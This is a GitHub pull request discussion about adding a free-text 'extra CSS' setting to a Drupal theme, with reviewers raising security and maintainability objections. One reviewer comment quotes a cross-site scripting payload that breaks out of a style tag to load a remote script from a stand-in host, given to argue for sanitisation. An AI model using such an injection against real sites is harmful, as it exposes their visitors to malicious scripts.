Skip to content

Adds theme setting for extra CSS #859

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Draft
markconroy wants to merge 1 commit into
base: 2.x
Choose a base branch
from
Draft

Adds theme setting for extra CSS #859

markconroy wants to merge 1 commit into from

Conversation

@markconroy
Copy link
Member

@markconroy markconroy commented Sep 15, 2025

Closes #858

What does this change?

Allows people to add extra CSS to the site via the theme settings.

Thanks to Big Blue Door for sponsoring my time to work on this.

@rupertj
Copy link
Member

rupertj commented Sep 15, 2025

The problem with this as-is it that there's no filtering or validation of what's put in, for example, you could put this in:

</style>
<script src="https://example.com/cross_site_scripting_attack.js"></script>
<style>

I think if there's a desire to have this, it should validate and sanitise the CSS correctly.

@tonypaulbarker
Copy link
Contributor

tonypaulbarker commented Sep 15, 2025

Not keen on this approach - even without potential security holes, maintaining sites with arbitrary code injected via CSS injector and asset injector contrib modules can be something of a challenge.

The discussion on slack is for a use case for making quick prototyping easier and consensus seems to be that this should never be used in production. If it's included in localgov_base it inevitably will be.

I suggest closing this MR and gathering requirements / solutionising that doesn't compromise the end product. The feature request seems to be "how can we do rapid prototyping without needing acces to the code / dev tools?".

@finnlewis
Copy link
Member

finnlewis commented Sep 16, 2025

Discussing at Merge Tuesday:

  • Mark would not recommend this on a live production site.
  • Tony suggesting that this might be better as a separate module, to allow for prototyping / testing.
  • Maria: 2 issues 1. prototyping 2. something minor for subsites... hex codes for certain colours for example. More boradly, can we review the concept holistically, where might site managers want to manage certain css / visual settings theough the browser?
  • Andy: module css_editor https://www.drupal.org/project/css_editor - could be a route for allowing folks to do this.
  • @willguv - what are the design tinkering needs on a production site?

@finnlewis finnlewis mentioned this pull request Sep 16, 2025
Open
@finnlewis
Copy link
Member

finnlewis commented Sep 23, 2025

From discussion in the Product Drop-in yesterday, there was a general feeling that we should move these sort of point and click css changes / injecting CSS to the Scarfolk theme for now to avoid tempting people to do this on a production site.

@finnlewis finnlewis marked this pull request as draft September 23, 2025 11:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@finnlewis finnlewis Awaiting requested review from finnlewis

@tonypaulbarker tonypaulbarker Awaiting requested review from tonypaulbarker

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

Allow extra CSS be added via the UI

5 participants

@markconroy @rupertj @tonypaulbarker @finnlewis